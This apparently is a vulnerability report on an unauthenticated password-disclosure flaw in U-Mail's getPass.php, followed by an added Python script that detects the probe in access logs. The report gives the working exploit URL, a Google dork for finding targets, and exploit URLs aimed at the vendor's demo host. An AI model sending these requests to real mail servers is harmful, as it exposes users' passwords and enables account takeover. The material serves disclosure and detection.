### Brief description:
The privileges of any specified user of this system can be obtained. I've seen a lot of people posting about this product recently; I'm not sure whether you'll find mine trivial.
### Details:
The U-Mail password-retrieval page (`getPass.php`) is badly designed: it lets any user's password be viewed without authorization. When the parameter `update=s` is supplied, the password of any account named in `email=` is returned.
```
http://mail.xxx.com/webmail/getPass.php?email=Services@xxx.com&update=s
```
This directly returns the password of the specified mailbox account:
![QQ20140522-1.png](https://images.seebug.org/upload/201405/221647055d477d9bda2dcaadeeff57bef1c63599.png)
From here you can do whatever you like.
Google dork (the footer string carried by U-Mail installations): `Powered by U-Mail 邮件服务器`
![QQ20140522-2.png](https://images.seebug.org/upload/201405/22164739089d7cb1ca0a05609137704f1fe65efb.png)
Vendor's official demo:
http://mail.comingchina.com/webmail/getPass1.php?email=umailtry@comingchina.com&update=s
http://mail.comingchina.com/webmail/getPass2.php?email=umailtry@comingchina.com&update=s
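Because the whole attack is a single unauthenticated GET, the most useful thing a defender can do while waiting for a vendor fix is to find it in the web server's access log. The script below is an added example, not code from the original report or from the U-Mail project. It assumes the web server writes Combined Log Format lines (the `LOG_RE` pattern is an assumption, adjust it for other formats), that the vulnerable scripts are the `getPass.php`, `getPass1.php` and `getPass2.php` names listed in this report, and that a password-recovery endpoint should never return a password at all; the sample log lines are constructed for the demonstration. It builds the probe URL from the report, flags requests matching the disclosure pattern, and groups them by client address so that one source asking for many users' passwords (the enumeration signature of this bug) stands out:

```python
"""Detect the U-Mail getPass.php password-disclosure pattern in access logs.

Added example; not the original report's or the U-Mail project's code.
Assumptions: Combined Log Format access logs, and the script names
getPass.php / getPass1.php / getPass2.php named in the report.
"""
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs, urlencode

# Combined Log Format (assumed):
# ip - - [time] "METHOD path HTTP/x" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Script names from the report: getPass.php plus the getPass1/getPass2
# variants exposed on the vendor demo host.
GETPASS_RE = re.compile(r'/webmail/getPass\d*\.php$', re.IGNORECASE)

# Constructed sample log; 203.0.113.7 probes two accounts with update=s,
# 198.51.100.4 only loads the normal recovery form and logs in, and
# 198.51.100.9 probes a single account through the getPass2.php variant.
SAMPLE_LOG = [
    '203.0.113.7 - - [22/May/2014:16:47:05 +0800] "GET /webmail/getPass.php?email=Services@xxx.com&update=s HTTP/1.1" 200 1342 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [22/May/2014:16:47:09 +0800] "GET /webmail/getPass.php?email=admin@xxx.com&update=s HTTP/1.1" 200 1298 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [22/May/2014:16:48:01 +0800] "GET /webmail/getPass.php?email=alice@xxx.com HTTP/1.1" 200 2210 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [22/May/2014:16:49:30 +0800] "GET /webmail/getPass2.php?email=umailtry@comingchina.com&update=s HTTP/1.1" 200 1301 "-" "curl/7.30"',
    '198.51.100.4 - - [22/May/2014:16:50:00 +0800] "POST /webmail/login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]


def build_probe_url(base, email):
    """Build the request the report describes: getPass.php?email=<target>&update=s.
    `base` is the webmail origin, e.g. the placeholder http://mail.xxx.com."""
    return f"{base.rstrip('/')}/webmail/getPass.php?{urlencode({'email': email, 'update': 's'})}"


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["path"])
    rec["script"] = parts.path
    rec["query"] = parse_qs(parts.query)
    rec["status"] = int(rec["status"])
    return rec


def is_getpass_disclosure(rec):
    """True when a request matches the disclosure pattern: a getPass*.php hit
    whose query string carries update=s together with an email parameter."""
    if rec is None or not GETPASS_RE.search(rec["script"]):
        return False
    q = rec["query"]
    return q.get("update", [""])[0] == "s" and bool(q.get("email", [""])[0])


def scan_log(lines):
    """Return {client_ip: sorted list of distinct accounts probed} for matching hits."""
    hits = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if is_getpass_disclosure(rec):
            hits[rec["ip"]].add(rec["query"]["email"][0].lower())
    return {ip: sorted(emails) for ip, emails in hits.items()}


def enumeration_sources(hits, threshold=2):
    """Client addresses that probed at least `threshold` distinct accounts."""
    return sorted(ip for ip, emails in hits.items() if len(emails) >= threshold)


if __name__ == "__main__":
    print("probe URL:", build_probe_url("http://mail.xxx.com", "Services@xxx.com"))
    found = scan_log(SAMPLE_LOG)
    for ip, emails in found.items():
        print(f"{ip} requested passwords for: {', '.join(emails)}")
    print("likely enumeration sources:", enumeration_sources(found))
```

A single `update=s` hit is already worth an alert on an unpatched host; the per-source grouping is there because an attacker who found this bug will typically walk a list of addresses harvested from the same domain, and that burst is what you will see in the log first.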
### Proof of vulnerability:
The two screenshots above: the password returned for the specified account, and the Google results for the dork.